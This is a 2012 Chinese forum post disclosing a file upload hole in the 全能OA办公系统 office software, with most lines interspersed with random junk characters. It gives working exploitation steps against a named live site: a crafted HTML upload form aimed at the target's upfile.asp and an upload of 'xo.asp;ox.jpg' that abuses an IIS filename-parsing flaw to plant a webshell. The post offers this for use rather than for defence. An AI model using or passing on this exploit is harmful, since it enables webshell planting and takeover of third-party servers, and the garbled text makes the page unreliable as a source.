找回密码
 立即注册
查看: 3336|回复: 0
打印 上一主题 下一主题

全能OA办公系统0day OA办公系统漏洞 上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-21 13:45:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
全能OA办公系统 上传漏洞1 v- e7 l1 F' o& _

. A; _) J: m! U1 H/ x系统介绍:* e" n7 `+ V9 @) ?( X
; {5 h7 l: r8 I4 t$ p- y
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
2 e) z2 T: n8 |& \! z3 i7 b% g, B) ^) o
主要功能:
7 f, J6 X, j/ E1 t3 H公司通告
! V& [1 C+ @  I6 U$ ]工作计划 2 U1 j: {, `- ?: ^) ^
通讯助理 6 L- |; @( M* q( s6 u/ j* S8 |& |
客户资源
  X, i. b- A* J. B我的公文
  W5 I2 O# T  H& z' x公文传阅 " ^. ]9 ~7 H& M$ h2 O5 z) m
公共资源
" Q( L/ O. w  F% I0 `资源预约 6 D4 N' I2 e$ O" j& z" w, ?6 Z
今日考勤
8 _* v" w4 m( R/ [* b个人计划
, h. S1 m6 B& ]( @' e, M个人通讯录
% n& A, Z9 L; {- E1 b; u个人基本档案 ( i! v5 E/ ^" y/ I1 ~
未读邮件
. b% k7 c# o1 i发邮件
! z4 l; ^% v7 v& k' k' l收件夹 5 s2 _0 L  F! J
寄件夹 , a1 H  K  q8 l. f8 c- c* ?
网络硬盘 6 K9 l  n1 {( m: K% ^) }
网络会议 1 |2 m% {; h1 q; B1 G) W
网络调查
, e; @& q4 o8 c! s; P9 p交流论坛
: i! K) c! ]. Y' b8 _0 f( ]7 Z- H- Z- ?+ {& e4 L. ]
有兴趣测试的朋友可以下源码看看; j, u7 _* ^' j+ U8 \& A" p- f

- ^2 s# t; X4 m* g源码下载:/ m8 Y! S6 z5 @2 d; C

/ O3 m7 j8 p8 X' S7 w2 [) Uhttp://www.mycodes.net/30/4750.htm
' {( i! n! K; n+ r# v( W1 s2 T9 }* b  v. v2 f; m1 O7 R
漏洞介绍:
7 ?5 n1 u$ J/ b5 [# r9 z
7 R5 z3 O7 ~6 g2 ^2 w2 V由upfile.asp上传文件漏洞引起2 S% U2 H" k& f

% X+ W+ q& P* `, D0 o9 X* g+ W测试方法:
. t: t% F! i  Z8 g, ~; i5 }& W- k+ L9 [+ F
使用名小子上传http://www.itlynn.com/upfile.asp即可
9 M' Z( ~0 u: z' L+ t2 _) F+ F5 x* [; l% v. l+ x# Y* f
如果upfile.asp文件被删除不存在。
7 v6 s4 \5 C- j5 k# S+ {# F1 ?' y! K5 m3 v& C! @
  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp
+ D( C0 {; K1 F% a0 D, G- X" |" R& p! \+ l' p) G8 C: f+ I2 z4 L" P. n
如果存在那么将如下代码保存为upfile.html。7 o. w+ `2 {. O# j7 i' y

* n5 W: \2 V5 [5 A" ^& z, F然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp$ I/ H& ]# Q' j* u0 ^6 P$ i

" Q6 g( S- }3 M+ s% F $ q# ~; R- S/ O3 S9 U0 s
6 A; @8 v6 A% m* \( f! I
01 <table border='0' align="center" cellpadding="5">
6 f7 }6 N5 |1 C5 `! k# T- L  [) q# _; `# k
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
, w+ R' Z+ n* P; M0 [2 t, r8 Y4 c; H. ~
03 <tr>
. d4 a% J0 {" J/ |' i6 r$ h1 ^+ u" ^: z7 c1 F9 \# N
04             <td>报错:</td> 3 ^' w3 J/ n3 N5 |5 h1 M8 k

6 Y1 n) v( b8 X3 J6 B+ U05             <td><input type='radio' name='errnumber' value='0'>
& G" X9 t/ k* E' F& z  y7 g
: ^8 i& R/ D( e$ o1 t, w06               自动更名 $ j1 i+ P0 I3 z+ c. P- b

: D5 R1 J! U+ W+ Y7 s& g- y07               <input type='radio' name='errnumber' value='1' checked>
* J& a, w3 v/ P1 P
5 X0 x2 F* {' X8 m7 l6 j08               报错方式 2 g2 T9 m+ J2 B( }7 \+ D& P

1 I+ ?3 v1 Q8 q( E! C" ?09               <input type='radio' name='errnumber' value='2'>
+ N! \6 O* I. E  d, S# u7 q7 ~0 N
6 O0 r  b4 S: P2 c# I10               直接覆盖</td> 6 q' l% T7 t% p; z
' f' K+ n) s' k1 M
11           </tr> ! x6 w/ ^, e( l3 i
1 f1 D) x2 L" N; r5 d0 z- x) \
12           <tr> 0 m- |: @% E& d) t: \
, C! H: r  S. a% ]9 O- P7 O
13             <td>主题:</td> 1 a# |5 X* i& V4 Q2 s) W% C: d
: T6 K2 n% [) M( _& o# o" j4 Q- [
14             <td><input type='text' name='filename' size='30'></td> ; n6 T3 t. c7 {2 K

4 A1 m: ~  O. G- J15           </tr>
) ~1 `8 r7 u$ N' M9 |3 |0 p) s1 I4 p6 j1 T' R
16           <tr>
7 N. ~' `& n3 r. M/ h, B/ A, z
8 N2 w) W" N7 ?! u17             <td>文件:</td> $ M. H* L) _, l% G4 r/ A  [/ A, z

. _) z! e0 Z. F% [18             <td><input type="file"name="fruit"size="30"></td>
& m( \/ t9 z5 R7 U: _! ], w4 ]
% B7 a. r! K& {$ u- H19           </tr>
( c7 ~8 |0 K% D9 m8 o, ?" r% r) p0 w* C5 T7 b, E
20           <tr>
7 j3 L: ~% f; I, K* t( k6 p' }& o2 l) d/ f4 Y
21             <td valign='top'>简介:</td>
: [3 b5 J. C& _) R$ Q1 R" k5 D
$ g0 o/ t" f* `2 u4 Y+ x. n22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> 0 }4 K! w# r2 ]' U, {) {

- l. K9 P1 j8 r! g# R$ k  Z0 H23           </tr> * j4 ?/ H+ e; s& ^

% r8 c7 N5 C% T24   
5 l& v; K) Q# ~! ?7 }! ^/ R- `
# L' x0 f% b& Q: j$ S6 e  X2 {25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> 6 f9 V0 v8 Y" o2 b

9 e; Y# t8 z9 n26           </tr>
  _9 z" {) k2 I" m% K3 }  Q( |9 j" f; ^3 U3 d. ~
27         </form>
$ [! p4 a' U! K( R! h
; v8 w% b8 R1 i4 D8 P% u. d7 [然后打开上传一个文件名为xo.asp;ox.jpg的文件。* j9 l' p# D) I# Z

5 s9 F4 q! f+ |) s# g5 g 8 R5 I) X5 f5 Q1 x4 l/ }4 `0 K' o

1 I) u+ R2 s0 @& h: C上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
9 L* n8 _! M6 }5 ^
4 B0 m+ W5 |2 P& A, q此漏洞需要配合解析漏洞利用。
# f9 s, v: r  s& o
1 G- d; k  w8 z3 \- w- |
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表